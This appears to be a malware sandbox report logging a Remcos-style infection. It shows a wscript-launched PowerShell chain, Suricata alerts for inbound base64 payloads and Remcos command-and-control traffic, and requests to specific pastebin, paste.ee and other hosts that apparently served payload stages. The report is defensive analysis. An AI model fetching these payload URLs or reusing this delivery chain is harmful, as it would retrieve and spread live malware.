              Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.17:60271 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.17:60273 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60279 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.17:60283 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.17:60284 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60289 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60291 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60290 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60294 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60295 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60313 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60315 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60312 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60310 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60314 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60311 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60317 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60318 version: TLS 1.2

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: chrome.exeMemory has grown: Private usage: 19MB later: 28MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 64.235.43.128:443 -> 192.168.2.17:60227
              Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 64.235.43.128:443 -> 192.168.2.17:60227
              Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 64.235.43.128:443 -> 192.168.2.17:60227
              Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 64.235.43.128:443 -> 192.168.2.17:60227
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60252 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60250 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60262 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60259 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60251 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60261 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 64.235.43.128:443 -> 192.168.2.17:60234
              Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 64.235.43.128:443 -> 192.168.2.17:60234
              Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 64.235.43.128:443 -> 192.168.2.17:60234
              Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 64.235.43.128:443 -> 192.168.2.17:60234
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 64.235.43.128:443 -> 192.168.2.17:60237
              Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 64.235.43.128:443 -> 192.168.2.17:60237
              Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 64.235.43.128:443 -> 192.168.2.17:60237
              Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 64.235.43.128:443 -> 192.168.2.17:60237
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60303 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60309 -> 46.246.86.12:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.17:60319 -> 46.246.86.12:2404
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: pastebin.com
              Source: unknownDNS query: name: paste.ee
              Uses dynamic DNS services
              Source: unknownDNS query: name: moneyluck.ddns.net
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.17:60078 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /raw/bYrRPs5M HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QBg5bdM9/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/SNtceP04 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QCV6zpQe/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ReM-SpReAd-XzY-2025.txt HTTP/1.1Host: demeurerhonealpes.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/rTh3f4Xw HTTP/1.1Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /raw/bYrRPs5M HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QBg5bdM9/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/vsnKLPWH/0 HTTP/1.1Host: paste.ee
              Source: global trafficHTTP traffic detected: GET /raw/SNtceP04 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QCV6zpQe/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ReM-SpReAd-XzY-2025.txt HTTP/1.1Host: demeurerhonealpes.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/SNtceP04 HTTP/1.1Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /d/QCV6zpQe/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/rTh3f4Xw HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ReM-SpReAd-XzY-2025.txt HTTP/1.1Host: demeurerhonealpes.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/vsnKLPWH/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/rTh3f4Xw HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/vsnKLPWH/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60226 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:60231 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60231 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60233 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60224 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:60228 -> 104.20.3.235:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60230 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.17:60253 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:60235 -> 104.20.3.235:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60236 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60244 -> 23.186.113.60:443
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.17:60241 -> 23.186.113.60:443
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKLast-Modified: Fri, 07 Feb 2025 06:55:57 GMTETag: 85430baed3398695717b0263807cf97cContent-Length: 453023Accept-Ranges: bytesX-Timestamp: 1738911356.44453Content-Type: application/zipX-Trans-Id: txf36a3cdb14a04fca91417-0067a71e89dfw1Cache-Control: public, max-age=34581Expires: Thu, 13 Feb 2025 17:18:40 GMTDate: Thu, 13 Feb 2025 07:42:19 GMTConnection: keep-aliveData Raw: 50 4b 03 04 14 00 00 00 08 00 cd 8d 62 4e d0 b9 df e8 52 e8 06 00 d0 97 0f 00 0f 00 00 00 67 6d 70 6f 70 65 6e 68 32 36 34 2e 64 6c 6c ec bd 0b 7c 14 45 b6 30 de 3d 99 84 49 98 a4 07 8c 18 31 c2 e8 ce ea 34 66 31 71 e3 9a 60 d4 e9 d0 93 f4 e0 04 c2 d3 80 88 71 a3 b9 a0 08 11 27 2b b8 10 08 93 68 2a 6d 7b d9 bb 7a d7 dd 6f 5f ff 7b 77 ef dd e7 c5 bd ee f2 d0 95 cc 24 92 07 28 24 41 21 c0 8a 11 7c 4c 18 81 00 42 26 41 32 ff 73 aa 7b 9e 04 44 64 f7 ff dd ff f7 f1 63 d2 55 d5 55 e7 d4 39 75 ce a9 53 a7 aa bb 4b 16 6c 60 12 18 86 d1 c3 2f 18 64 98 2d 8c fa cf c6 7c f9 bf 00 fc d2 26 be 9e c6 fc 39 f9 9d 9b b6 b0 ce 77 6e 9a b3 78 c9 d3 e6 aa 15 cb ff 69 c5 23 4f 9a 2b 1e 59 b6 6c b9 cb fc dd c7 cc 2b aa 97 99 97 2c 33 8b 33 66 9b 9f 5c fe e8 63 93 53 53 53 2c 1a 8c e9 d2 cf b7 a4 f0 fd fe d0 ef b1 92 cf 8f 4e a4 d7 d3 47 47 d1 eb 99 a3 ff 46 af 27 8f 26 d3 3a 27 fd 4b e0 5a 26 9c 3e 9a 40 af 67 8e de 4d af 9f 1f 4d d7 60 fc 13 fc 2a 84 fe a3 a3 e9 f5 14 bd ce 5a 52 b1 18 ef 85 fa 5e 6a 67 98 47 9f 4b 62 8e 6f 7e 76 61 a8 ac 9f b9 d9 3c 5a 97 c6 31 2e 23 c3 8c 4f a0 65 19 99 a3 19 c6 44 93 eb 58 fc 8b 69 1d c3 24 69 6d 42 57 c6 c3 51 26 be ba c1 04 b7 cb d9 50 a3 d0 e5 c2 bc 9a 2c 4d e4 98 2c a8 bd 3a 89 63 ac d1 cc 2d e5 98 0d 12 5c 9f e5 98 ce 1b e1 fa 2a c7 d4 01 8a ce 2d 69 cc 9c 4b 8c 49 f6 d6 34 86 61 a3 0a 36 18 99 2a dd c5 eb 4f 76 3d b6 d2 05 57 cb d3 46 b5 43 48 bb 3e b6 8e 99 61 ca 27 af 78 f4 11 d7 23 40 66 8d 8e c2 64 d6 c1 75 a5 31 a6 9e 0d fe 4f 56 ab 31 6f 7d 1b 09 84 0e 67 c2 35 90 16 5f cf 33 b9 4a ad 48 69 04 5a 99 69 70 4d e7 2e 84 b7 62 b9 5a 11 86 81 f9 25 dc 47 94 8b 46 aa f7 d8 d2 e5 15 0c e5 11 f2 8a d2 f2 f8 05 f5 0a 2f ce 89 ff 33 ff 71 9b d9 4a af c7 d0 f2 b6 f6 6f de 03 b3 25 f7 67 d9 4e d2 2a 91 7d 12 d9 29 c9 33 0d 4e 25 f1 21 b7 91 71 2a a9 0b e0 e2 eb b8 8b 81 b4 f1 5e 49 9e 6d 90 c8 7e 07 09 f8 36 dd 85 23 e9 7e 2b fb c1 87 17 85 41 d1 7f 12 49 5d 72 03 c7 e4 78 b4 e2 b9 2a 82 3c 49 59 6a c9 96 da ec cc 70 30 18 8c 60 53 ae 4d 40 14 45 f7 8f 66 ea 3d ae 3b 21 cf 40 1e b0 f8 be 0d 45 c4 bb 05 45 bb be a3 fa 9e ad 1b 20 e1 9b 9c 30 1a 6e da 03 12 f1 4a 64 c8 b7 1c 64 d2 7f fd d6 06 bc 75 4d ec 2d 94 71 49 c6 6c 52 8e 07 7a 9a 07 3d 7d a8 a5 72 83 44 e6 58 4c 5a a7 ac 92 f2 78 b6 24 97 04 7c 63 a1 31 d2 63 55 6b 4d e6 26 d6 51 6e 5d ac fe 61 5d 74 fd 68 fa a1 2a d4 b4 21 b9 36 20 37 80 e4 4a 64 af 44 76 4b 4a 22 57 67 64 2a 25 6e 99 07 d2 bf 77 ab e9 f6 4a 6e 69 fb 69 6e 6d 72 9b 40 4d 85 24 27 5a c7 73 8c 04 ec 18 23 29 25 bd Data Ascii: PKbNRgmpopenh264.dll|E0=I14f1q`
              Source: global trafficHTTP traffic detected: GET /file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/view?usp=sharing HTTP/1.1Host: drive.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /auth_warmup HTTP/1.1Host: drive.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /drivesharing/clientmodel?id=1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s&foreignService=texmex&authuser=0&origin=https%3A%2F%2Fdrive.google.com HTTP/1.1Host: drive.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /viewer2/prod-02/archive?ck=drive&ds=APznzaaNbpEe25LXChfwaWxJy58bQE5feWN-tR9kwE5BYOTr4B_P9nBVSRnQhRZYlGjMb37Au674rgK6NnRgmpWGs8YKVybaxRb8C9gqX9K9TCrmVZtYveGE_OLnXJdJFQ_3fb2EPqJZBf36fSppVpBSe4_LiGWhtdKtndis4RfbTHjqgkgnwrK0-2BhZZIYs-7RTjWfBiGa5rgNuTPCT2QnarUMxfz92DXxJPDQ_JvRZpGqxqSEECBX0zBbKliJMyO9gh9QMU0wU0069afIuYHe50XBKjymHqPYQ0PFZJ_g0S8QWThegkAKT_xAJr9BS1l4HJO0gYvBX6YT-pCCSPdBs8St56EqnG01K4mSW2LBiNjKFYeNkBnXCItUXTmMrvDd7jHgp8bBmQrohkoqRqVP-4N89s1thSPweOLWTtTEiTHTjvLk62I%3D&authuser=0&page=0 HTTP/1.1Host: drive.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_1 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
